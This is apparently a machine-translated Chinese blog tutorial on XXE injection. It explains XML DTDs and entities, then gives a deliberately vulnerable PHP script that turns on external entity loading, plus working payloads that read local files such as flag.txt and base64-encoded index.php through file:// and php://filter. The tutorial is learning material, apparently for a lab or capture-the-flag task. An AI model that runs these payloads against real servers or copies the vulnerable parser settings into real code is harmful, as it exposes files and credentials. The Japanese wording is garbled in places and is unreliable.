第20(1)

XXEプロフィール

XXE:XML外部エンティティインジェクションのフルネーム、すなわちXML外部エンティティインジェクションの脆弱性

知識ポイント

1、XML
2、DTDは、これが最も重要である
:はじめに
(1)内部DOCTYPE宣言

假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中:
<!DOCTYPE 根元素 [元素声明]>
例如:
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to      (#PCDATA)>
  <!ELEMENT from    (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body    (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>
以上 DTD 解释如下:
!DOCTYPE note (第二行)定义此文档是 note 类型的文档。
!ELEMENT note (第三行)定义 note 元素有四个元素:"to、from、heading,、body"
!ELEMENT to (第四行)定义 to 元素为 "#PCDATA" 类型
!ELEMENT from (第五行)定义 from 元素为 "#PCDATA" 类型
!ELEMENT heading (第六行)定义 heading 元素为 "#PCDATA" 类型
!ELEMENT body (第七行)定义 body 元素为 "#PCDATA" 类型

(2)外部ドキュメント宣言

假如 DTD 位于 XML 源文件的外部,那么它应通过下面的语法被封装在一个 DOCTYPE 定义中:
<!DOCTYPE 根元素 SYSTEM "文件名">

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
这是包含 DTD 的 "note.dtd" 文件:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

下面的实体在 XML 中被预定义:
实体引用  字符
&lt;  <
&gt;  >
&amp;   &
&quot;  "
&apos;  '

在 DTD 中,XML 元素通过元素声明来进行声明。元素声明使用下面的语法:
<!ELEMENT 元素名称 类别>
或者
<!ELEMENT 元素名称 (元素内容)>

(3)フォーカスのXXE使用:エンティティ
(3)-1:はじめに
エンティティは、プレーンテキストまたは特殊文字を参照するためのショートカットを定義するために使用される変数です。
実体参照は、実体への参照です。
エンティティは、内部または外部を宣言することができます。

(3)-2:内部エンティティ宣言

语法:
<!ENTITY 实体名称 "实体的值">

例子:
DTD 例子:
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

XML 例子:
<author>&writer;&copyright;</author>

注释: 一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (;)。

(3)-3:外部エンティティ宣言

语法:
<!ENTITY 实体名称 SYSTEM "URI/URL">

例子:
DTD 例子:
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

XML 例子:
<author>&writer;&copyright;</author>

(3)-4:補足
任意のコンテンツを有する要素
素子のカテゴリーは、任意の文を、任意の組み合わせを含むことができる構文解析することができるデータでキーワード:

<!ELEMENT 元素名称 ANY>
例子:
<!ELEMENT note ANY>

理解下面的代码含义:这是POST提交的
上面是一个XXE攻击的Payload
<?xml version="1.0" encoding="utf-8"?>//xml格式必备
<!DOCTYPE root [	(注):内部的DOCTYPE声明,声明一个root根元素
<!ELEMENT root ANY >	(注):定义root根元素的子元素可以是任何组合
<!ENTITY xxx SYSTEM "php://filter/read=convert.base64-encode/resource=flag.txt" >	(注):声明一个xml代码外的外部实体名叫xxx,SYSTEM后面的是它的值
  ]>	(注):闭合

<root>	(注):XML代码的根元素,也就是上面DTD中的root根元素,这个必须一样,因为上面的DTD就是检查下面的XML代码的
  <user>&xxx;</user>	(注):XML代码的子元素user,&xxx,表示在XML代码内部执行外部DTD的实体函数xxx
  <pass>mypass</pass>	(注):XML代码的子元素pass
</root>	(注):闭合根元素

例外部エンティティ注入

読んでローカルのファイルがありエコー
コードを悪用します:

 <?php
libxml_disable_entity_loader (false);
show_source(__FILE__);
$xmlfile = file_get_contents('php://input');
echo '<br>';
if(strlen($xmlfile)>0){

    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;

    echo "You have logged in as user $user";
}
?>

ペイロード:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [	//foo名称随意
    <!ENTITY xxe SYSTEM "file:///F:/flag.txt" >		//xxe名称随意
    ]>
<root>		//xml根元素名称随意,但必须要有(在当前漏洞源码环境下)
<user>&xxe;</user>		//xxe名称和上面的名称对应,在这里xml中的子元素user和漏洞源码中的对应,不可修改为其它
</root>

//フィルタの内容を読み出すことに変換して、BASE64:いくつかのファイルは、ファイルがエラーを解析につながる直接読まれている場合、<、>、および他のエンティティは、その後、あなたがPHPを使用することができます持っています

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
    <!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >
    ]>
<root>
    <user>&file;</user>
</root>

特記事項:

实体名称命名不能以数字开头,例如上面的xxx
使用bp时,需要添加Content-Type: application/xml
payload中xml的根元素
xml形式的数据传输e.g:<user>admin</user>

XXEの浅い理解、さらに綿密なフォローアップ研究。

公開された152元の記事 ウォン称賛63 ビュー60000 +

おすすめ

転載: blog.csdn.net/qq_41617034/article/details/105350612